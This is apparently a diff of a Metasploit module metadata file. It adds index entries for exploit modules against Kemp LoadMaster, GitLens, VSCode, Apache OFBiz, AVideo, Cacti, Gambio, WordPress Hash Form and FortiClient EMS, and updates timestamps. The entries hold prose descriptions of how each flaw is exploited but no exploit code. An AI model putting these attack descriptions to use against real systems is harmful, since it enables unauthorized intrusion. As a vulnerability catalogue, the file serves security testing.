+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": [
+
+    ]
+  },
+  "exploit_linux/local/progress_kemp_loadmaster_sudo_privesc_2024": {
+    "name": "Kemp LoadMaster Local sudo privilege escalation",
+    "fullname": "exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-19",
+    "type": "exploit",
+    "author": [
+      "Dave Yesland with Rhino Security Labs",
+      "bwatters-r7"
+    ],
+    "description": "This module abuses a feature of the sudo command on Progress Kemp\n          LoadMaster.  Certain binary files are allowed to automatically elevate\n          with the sudo command.  This is based off of the file name.  Some files\n          have this permission are not write-protected from the default 'bal' user.\n          As such, if the file is overwritten with an arbitrary file, it will still\n          auto-elevate.  This module overwrites the /bin/loadkeys file with another\n          executable.",
+    "references": [
+      "URL-https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/",
+      "URL-https://kemptechnologies.com/kemp-load-balancers"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Dropper",
+      "Command"
+    ],
+    "mod_time": "2024-05-10 08:54:23 +0000",
+    "path": "/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/progress_kemp_loadmaster_sudo_privesc_2024",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": [
+
+    ]
+  },
   "exploit_linux/local/ptrace_sudo_token_priv_esc": {
     "name": "ptrace Sudo Token Privilege Escalation",
     "fullname": "exploit/linux/local/ptrace_sudo_token_priv_esc",
@@ -87876,7 +89229,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2023-12-19 19:01:45 +0000",
+    "mod_time": "2024-04-22 15:12:27 +0000",
     "path": "/modules/exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "linux/local/vcenter_java_wrapper_vmon_priv_esc",
@@ -87888,7 +89241,8 @@
         "crash-service-down"
       ],
       "Reliability": [
-        "repeatable-session"
+        "repeatable-session",
+        "event-dependent"
       ],
       "SideEffects": [
         "artifacts-on-disk",
@@ -90041,7 +91395,7 @@
       "Minions (Python payload)",
       "Minions (Unix command)"
     ],
-    "mod_time": "2021-09-17 16:34:46 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
     "path": "/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb",
     "is_install_path": true,
     "ref_name": "linux/misc/saltstack_salt_unauth_rce",
@@ -95301,6 +96655,61 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_multi/fileformat/gitlens_local_config_exec": {
+    "name": "GitLens Git Local Configuration Exec",
+    "fullname": "exploit/multi/fileformat/gitlens_local_config_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-11-14",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Paul Gerste"
+    ],
+    "description": "GitKraken GitLens before v.14.0.0 allows an untrusted workspace to execute git\n          commands. A repo may include its own .git folder including a malicious config file to\n          execute arbitrary code.\n\n          Tested against VSCode 1.87.2 with GitLens 13.6.0 on Ubuntu 22.04 and Windows 10",
+    "references": [
+      "URL-https://www.sonarsource.com/blog/vscode-security-markdown-vulnerabilities-in-extensions/",
+      "URL-https://www.sonarsource.com/blog/securing-developer-tools-git-integrations/",
+      "URL-https://github.com/gitkraken/vscode-gitlens/commit/ee2a0c42a92d33059a39fd15fbbd5dd3d5ab6440",
+      "CVE-2023-46944"
+    ],
+    "platform": "",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Linux/Unix (In-Memory)",
+      "PowerShell (In-Memory)"
+    ],
+    "mod_time": "2024-04-18 17:31:02 +0000",
+    "path": "/modules/exploits/multi/fileformat/gitlens_local_config_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/fileformat/gitlens_local_config_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "screen-effects",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_multi/fileformat/js_unpacker_eval_injection": {
     "name": "Javascript Injection for Eval-based Unpackers",
     "fullname": "exploit/multi/fileformat/js_unpacker_eval_injection",
@@ -95548,7 +96957,7 @@
       "Microsoft Office Word on Windows",
       "Microsoft Office Word on Mac OS X (Python)"
     ],
-    "mod_time": "2022-03-10 18:03:35 +0000",
+    "mod_time": "2024-05-28 14:01:31 +0000",
     "path": "/modules/exploits/multi/fileformat/office_word_macro.rb",
     "is_install_path": true,
     "ref_name": "multi/fileformat/office_word_macro",
@@ -95649,6 +97058,57 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_multi/fileformat/visual_studio_vsix_exec": {
+    "name": "Code Reviewer",
+    "fullname": "exploit/multi/fileformat/visual_studio_vsix_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-22",
+    "type": "exploit",
+    "author": [
+      "h00die"
+    ],
+    "description": "Reviews code",
+    "references": [
+      "URL-https://medium.com/@VakninHai/the-hidden-risks-of-visual-studio-extensions-a-new-avenue-for-persistence-attacks-e56722c048f1",
+      "URL-https://code.visualstudio.com/api/get-started/your-first-extension",
+      "URL-https://code.visualstudio.com/api/references/activation-events"
+    ],
+    "platform": "NodeJS",
+    "arch": "nodejs",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-04-17 16:13:44 +0000",
+    "path": "/modules/exploits/multi/fileformat/visual_studio_vsix_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/fileformat/visual_studio_vsix_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_multi/fileformat/zip_slip": {
     "name": "Generic Zip Slip Traversal Vulnerability",
     "fullname": "exploit/multi/fileformat/zip_slip",
@@ -96329,7 +97789,7 @@
       "Unix Command",
       "Linux Dropper"
     ],
-    "mod_time": "2024-01-05 22:31:51 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
     "path": "/modules/exploits/multi/http/apache_commons_text4shell.rb",
     "is_install_path": true,
     "ref_name": "multi/http/apache_commons_text4shell",
@@ -96777,7 +98237,7 @@
       "Automatic (Dropper)",
       "Unix Command (In-Memory)"
     ],
-    "mod_time": "2021-10-10 17:01:15 +0000",
+    "mod_time": "2024-05-01 20:01:38 +0000",
     "path": "/modules/exploits/multi/http/apache_normalize_path_rce.rb",
     "is_install_path": true,
     "ref_name": "multi/http/apache_normalize_path_rce",
@@ -96799,6 +98259,68 @@
     "session_types": false,
     "needs_cleanup": true
   },
+  "exploit_multi/http/apache_ofbiz_forgot_password_directory_traversal": {
+    "name": "Apache OFBiz Forgot Password Directory Traversal",
+    "fullname": "exploit/multi/http/apache_ofbiz_forgot_password_directory_traversal",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-05-30",
+    "type": "exploit",
+    "author": [
+      "Mr-xn",
+      "jheysel-r7"
+    ],
+    "description": "Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable\n          endpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint which in\n          turn allows for remote code execution in the context of the user running the application.",
+    "references": [
+      "URL-https://github.com/Mr-xn/CVE-2024-32113",
+      "URL-https://xz.aliyun.com/t/14733?time__1311=mqmx9Qwx0WDsd5YK0%3Dai%3Dmd7KbxGupD&alichlgref=https%3A%2F%2Fgithub.com%2FMr-xn%2FCVE-2024-32113",
+      "CVE-2024-32113"
+    ],
+    "platform": "Linux,Windows",
+    "arch": "cmd",
+    "rport": 8443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Command",
+      "Windows Command"
+    ],
+    "mod_time": "2024-06-14 16:59:55 +0000",
+    "path": "/modules/exploits/multi/http/apache_ofbiz_forgot_password_directory_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/apache_ofbiz_forgot_password_directory_traversal",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_multi/http/apache_rocketmq_update_config": {
     "name": "Apache RocketMQ update config RCE",
     "fullname": "exploit/multi/http/apache_rocketmq_update_config",
@@ -96830,7 +98352,7 @@
     "targets": [
       "Automatic (Unix In-Memory)"
     ],
-    "mod_time": "2023-06-08 17:34:45 +0000",
+    "mod_time": "2024-04-26 14:24:08 +0000",
     "path": "/modules/exploits/multi/http/apache_rocketmq_update_config.rb",
     "is_install_path": true,
     "ref_name": "multi/http/apache_rocketmq_update_config",
@@ -97509,6 +99031,70 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_multi/http/avideo_wwbnindex_unauth_rce": {
+    "name": "AVideo WWBNIndex Plugin Unauthenticated RCE",
+    "fullname": "exploit/multi/http/avideo_wwbnindex_unauth_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-04-09",
+    "type": "exploit",
+    "author": [
+      "Valentin Lobstein"
+    ],
+    "description": "This module exploits an unauthenticated remote code execution (RCE) vulnerability\n          in the WWBNIndex plugin of the AVideo platform. The vulnerability exists within the\n          `submitIndex.php` file, where user-supplied input is passed directly to the `require()`\n          function without proper sanitization. By exploiting this, an attacker can leverage the\n          PHP filter chaining technique to execute arbitrary PHP code on the server. This allows\n          for the execution of commands and control over the affected system. The exploit is\n          particularly dangerous because it does not require authentication, making it possible\n          for any remote attacker to exploit this vulnerability.",
+    "references": [
+      "CVE-2024-31819",
+      "URL-https://github.com/WWBN/AVideo",
+      "URL-https://chocapikk.com/posts/2024/cve-2024-31819"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "php, cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic",
+      "PHP In-Memory",
+      "Unix In-Memory",
+      "Windows In-Memory"
+    ],
+    "mod_time": "2024-05-15 22:13:53 +0000",
+    "path": "/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/avideo_wwbnindex_unauth_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_multi/http/axis2_deployer": {
     "name": "Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)",
     "fullname": "exploit/multi/http/axis2_deployer",
@@ -97846,6 +99432,70 @@
     "session_types": false,
     "needs_cleanup": true
   },
+  "exploit_multi/http/cacti_package_import_rce": {
+    "name": "Cacti Import Packages RCE",
+    "fullname": "exploit/multi/http/cacti_package_import_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-05-12",
+    "type": "exploit",
+    "author": [
+      "Egidio Romano",
+      "Christophe De La Fuente"
+    ],
+    "description": "This exploit module leverages an arbitrary file write vulnerability\n          (CVE-2024-25641) in Cacti versions prior to 1.2.27 to achieve RCE. It\n          abuses the `Import Packages` feature to upload a specially crafted\n          package that embeds a PHP file. Cacti will extract this file to an\n          accessible location. The module finally triggers the payload to execute\n          arbitrary PHP code in the context of the user running the web server.\n\n          Authentication is needed and the account must have access to the\n          `Import Packages` feature. This is granted by setting the `Import\n          Templates` permission in the `Template Editor` section.",
+    "references": [
+      "URL-https://karmainsecurity.com/KIS-2024-04",
+      "URL-https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88",
+      "CVE-2024-25641"
+    ],
+    "platform": "Windows",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Linux Command",
+      "Windows Command"
+    ],
+    "mod_time": "2024-06-12 19:15:01 +0000",
+    "path": "/modules/exploits/multi/http/cacti_package_import_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/cacti_package_import_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
   "exploit_multi/http/cacti_pollers_sqli_rce": {
     "name": "Cacti RCE via SQLi in pollers.php",
     "fullname": "exploit/multi/http/cacti_pollers_sqli_rce",
@@ -97888,7 +99538,7 @@
       "Linux Command",
       "Windows Command"
     ],
-    "mod_time": "2024-02-02 11:45:51 +0000",
+    "mod_time": "2024-05-23 10:54:20 +0000",
     "path": "/modules/exploits/multi/http/cacti_pollers_sqli_rce.rb",
     "is_install_path": true,
     "ref_name": "multi/http/cacti_pollers_sqli_rce",
@@ -99528,6 +101178,70 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_multi/http/gambio_unauth_rce_cve_2024_23759": {
+    "name": "Gambio Online Webshop unauthenticated PHP Deserialization Vulnerability",
+    "fullname": "exploit/multi/http/gambio_unauth_rce_cve_2024_23759",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-01-19",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "usd Herolab"
+    ],
+    "description": "A Remote Code Execution vulnerability in Gambio online webshop version 4.9.2.0 and lower\n          allows remote attackers to run arbitrary commands via unauthenticated HTTP POST request.\n          The identified vulnerability within Gambio pertains to an insecure deserialization flaw,\n          which ultimately allows an attacker to execute remote code on affected systems.\n          The insecure deserialization vulnerability in Gambio poses a significant risk to affected systems.\n          As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,\n          potentially resulting in complete system compromise, data exfiltration, or unauthorized access\n          to sensitive information.",
+    "references": [
+      "CVE-2024-23759",
+      "URL-https://attackerkb.com/topics/cxCsICfcDY/cve-2024-23759",
+      "URL-https://herolab.usd.de/en/security-advisories/usd-2023-0046/"
+    ],
+    "platform": "Linux,PHP,Unix",
+    "arch": "php, cmd, x64, x86",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2024-04-19 13:44:18 +0000",
+    "path": "/modules/exploits/multi/http/gambio_unauth_rce_cve_2024_23759.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/gambio_unauth_rce_cve_2024_23759",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
   "exploit_multi/http/gestioip_exec": {
     "name": "GestioIP Remote Command Execution",
     "fullname": "exploit/multi/http/gestioip_exec",
@@ -102136,7 +103850,7 @@
     "targets": [
       "Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2"
     ],
-    "mod_time": "2020-08-14 13:11:38 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
     "path": "/modules/exploits/multi/http/liferay_java_unmarshalling.rb",
     "is_install_path": true,
     "ref_name": "multi/http/liferay_java_unmarshalling",
@@ -102781,7 +104495,7 @@
       "Unix Command",
       "Linux Dropper"
     ],
-    "mod_time": "2024-03-04 20:33:27 +0000",
+    "mod_time": "2024-02-13 16:15:48 +0000",
     "path": "/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb",
     "is_install_path": true,
     "ref_name": "multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966",
@@ -103221,7 +104935,7 @@
     "targets": [
       "Micro Focus Operations Bridge Manager <= 2020.05 (and many other MF products)"
     ],
-    "mod_time": "2023-02-10 18:04:31 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
     "path": "/modules/exploits/multi/http/microfocus_obm_auth_rce.rb",
     "is_install_path": true,
     "ref_name": "multi/http/microfocus_obm_auth_rce",
@@ -108006,7 +109720,7 @@
       "x86/x64 Windows CmdStager",
       "Windows Exec"
     ],
-    "mod_time": "2023-02-10 18:04:31 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
     "path": "/modules/exploits/multi/http/solr_velocity_rce.rb",
     "is_install_path": true,
     "ref_name": "multi/http/solr_velocity_rce",
@@ -110089,7 +111803,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2023-10-11 16:56:20 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
     "path": "/modules/exploits/multi/http/torchserver_cve_2023_43654.rb",
     "is_install_path": true,
     "ref_name": "multi/http/torchserver_cve_2023_43654",
@@ -111967,6 +113681,69 @@
     "session_types": false,
     "needs_cleanup": true
   },
+  "exploit_multi/http/wp_hash_form_rce": {
+    "name": "WordPress Hash Form Plugin RCE",
+    "fullname": "exploit/multi/http/wp_hash_form_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-05-23",
+    "type": "exploit",
+    "author": [
+      "Francesco Carlucci",
+      "Valentin Lobstein"
+    ],
+    "description": "The Hash Form – Drag & Drop Form Builder plugin for WordPress suffers from a critical vulnerability\n          due to missing file type validation in the file_upload_action function. This vulnerability exists\n          in all versions up to and including 1.1.0. Unauthenticated attackers can exploit this flaw to upload arbitrary\n          files, including PHP scripts, to the server, potentially allowing for remote code execution on the affected\n          WordPress site. This module targets multiple platforms by adapting payload delivery and execution based on the\n          server environment.",
+    "references": [
+      "CVE-2024-5084",
+      "URL-https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hash-form/hash-form-drag-drop-form-builder-110-unauthenticated-arbitrary-file-upload-to-remote-code-execution"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP In-Memory",
+      "Unix/Linux Command Shell",
+      "Windows Command Shell"
+    ],
+    "mod_time": "2024-06-05 10:14:48 +0000",
+    "path": "/modules/exploits/multi/http/wp_hash_form_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/wp_hash_form_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_multi/http/wp_ninja_forms_unauthenticated_file_upload": {
     "name": "WordPress Ninja Forms Unauthenticated File Upload",
     "fullname": "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload",
@@ -113499,7 +115276,7 @@
       "Linux",
       "Unix"
     ],
-    "mod_time": "2023-11-06 09:42:59 +0000",
+    "mod_time": "2024-04-29 16:15:50 +0000",
     "path": "/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb",
     "is_install_path": true,
     "ref_name": "multi/misc/apache_activemq_rce_cve_2023_46604",
@@ -115170,6 +116947,60 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_multi/misc/vscode_ipynb_remote_dev_exec": {
+    "name": "VSCode ipynb Remote Development RCE",
+    "fullname": "exploit/multi/misc/vscode_ipynb_remote_dev_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-11-22",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Zemnmez"
+    ],
+    "description": "VSCode when opening an Jupyter notebook (.ipynb) file bypasses the trust model.\n          On versions v1.4.0 - v1.71.1, its possible for the Jupyter notebook to embed\n          HTML and javascript, which can then open new terminal windows within VSCode.\n          Each of these new windows can then execute arbitrary code at startup.\n\n          During testing, the first open of the Jupyter notebook resulted in pop-ups\n          displaying errors of unable to find the payload exe file. The second attempt\n          at opening the Jupyter notebook would result in successful exeuction.\n\n          Successfully tested against VSCode 1.70.2 on Windows 10.",
+    "references": [
+      "URL-https://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m",
+      "CVE-2022-41034",
+      "URL-https://github.com/andyhsu024/CVE-2022-41034"
+    ],
+    "platform": "",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows",
+      "Linux File-Dropper"
+    ],
+    "mod_time": "2024-05-13 10:11:56 +0000",
+    "path": "/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/misc/vscode_ipynb_remote_dev_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "first-attempt-fail"
+      ],
+      "SideEffects": [
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_multi/misc/w3tw0rk_exec": {
     "name": "w3tw0rk / Pitbul IRC Bot  Remote Code Execution",
     "fullname": "exploit/multi/misc/w3tw0rk_exec",
@@ -122078,7 +123909,7 @@
     "description": "This module exploits a remote command execution vulnerability in Zivif\n          webcams.  This is known to impact versions prior to and including v2.3.4.2103.\n          Exploit was reported in CVE-2017-17105.",
     "references": [
       "URL-https://seclists.org/fulldisclosure/2017/Dec/42",
-      "CVE-2017-171069"
+      "CVE-2017-17105"
     ],
     "platform": "Unix",
     "arch": "",
@@ -122101,7 +123932,7 @@
     "targets": [
       "Automatic Target"
     ],
-    "mod_time": "2023-02-10 18:04:31 +0000",
+    "mod_time": "2024-06-11 17:35:39 +0000",
     "path": "/modules/exploits/unix/http/zivif_ipcheck_exec.rb",
     "is_install_path": true,
     "ref_name": "unix/http/zivif_ipcheck_exec",
@@ -129487,7 +131318,7 @@
     "disclosure_date": "2015-10-10",
     "type": "exploit",
     "author": [
-      "Unknown",
+      "PizzaHatHacker",
       "Roberto Soares Espreto <robertoespreto@gmail.com>"
     ],
     "description": "This module exploits an arbitrary file upload in the WordPress Ajax Load More\n        version 2.8.1.1. It allows to upload arbitrary php files and get remote code\n        execution. This module has been tested successfully on WordPress Ajax Load More\n        2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.",
@@ -129515,7 +131346,7 @@
     "targets": [
       "Ajax Load More 2.8.1.1"
     ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-06-01 16:00:45 +0000",
     "path": "/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb",
     "is_install_path": true,
     "ref_name": "unix/webapp/wp_ajax_load_more_file_upload",
@@ -152949,7 +154780,7 @@
     "targets": [
       "Windows"
     ],
-    "mod_time": "2023-09-07 22:01:49 +0000",
+    "mod_time": "2024-05-28 14:01:31 +0000",
     "path": "/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/winrar_cve_2023_38831",
@@ -153184,7 +155015,7 @@
     "targets": [
       "Microsoft Office Word"
     ],
-    "mod_time": "2022-08-25 15:56:39 +0000",
+    "mod_time": "2024-05-28 14:01:31 +0000",
     "path": "/modules/exploits/windows/fileformat/word_msdtjs_rce.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/word_msdtjs_rce",
@@ -153245,7 +155076,7 @@
     "targets": [
       "Hosted"
     ],
-    "mod_time": "2021-12-08 17:22:44 +0000",
+    "mod_time": "2024-05-28 14:01:31 +0000",
     "path": "/modules/exploits/windows/fileformat/word_mshtml_rce.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/word_mshtml_rce",
@@ -158593,7 +160424,7 @@
       "URL-https://github.com/pwntester/ysoserial.net"
     ],
     "platform": "Windows",
-    "arch": "",
+    "arch": "x86, x64",
     "rport": 80,
     "autofilter_ports": [
       80,
@@ -158617,7 +160448,7 @@
       "v9.2.0 - v9.2.1",
       "v9.2.2 - v9.3.0-RC"
     ],
-    "mod_time": "2022-12-04 17:50:24 +0000",
+    "mod_time": "2024-06-18 09:23:41 +0000",
     "path": "/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb",
     "is_install_path": true,
     "ref_name": "windows/http/dnn_cookie_deserialization_rce",
@@ -159967,6 +161798,69 @@
     "session_types": false,
     "needs_cleanup": null
   },
+  "exploit_windows/http/forticlient_ems_fctid_sqli": {
+    "name": "FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE",
+    "fullname": "exploit/windows/http/forticlient_ems_fctid_sqli",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-04-21",
+    "type": "exploit",
+    "author": [
+      "Zach Hanley",
+      "James Horseman",
+      "jheysel-r7",
+      "Spencer McIntyre"
+    ],
+    "description": "An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).\n          FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized\n          platform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings which\n          can be sent directly into database queries.\n\n          FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013\n          and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.\n          In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable\n          SQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote code\n          execution in the context of NT AUTHORITY\\SYSTEM\n\n          Affected versions of FortiClient EMS include:\n          7.2.0 through 7.2.2\n          7.0.1 through 7.0.10\n\n          Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.\n\n          It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient\n          EMS for the necessary vulnerable services to be available.",
+    "references": [
+      "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/",
+      "URL-https://github.com/horizon3ai/CVE-2023-48788/blob/main/CVE-2023-48788.py",
+      "CVE-2023-48788"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 8013,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2024-04-12 10:00:07 +0000",
+    "path": "/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/forticlient_ems_fctid_sqli",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
   "exploit_windows/http/fortilogger_arbitrary_fileupload": {
     "name": "FortiLogger Arbitrary File Upload Exploit",
     "fullname": "exploit/windows/http/fortilogger_arbitrary_fileupload",
@@ -163732,7 +165626,7 @@
       "Windows EXE Dropper",
       "Windows Command"
     ],
-    "mod_time": "2024-02-22 23:19:58 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
     "path": "/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb",
     "is_install_path": true,
     "ref_name": "windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966",
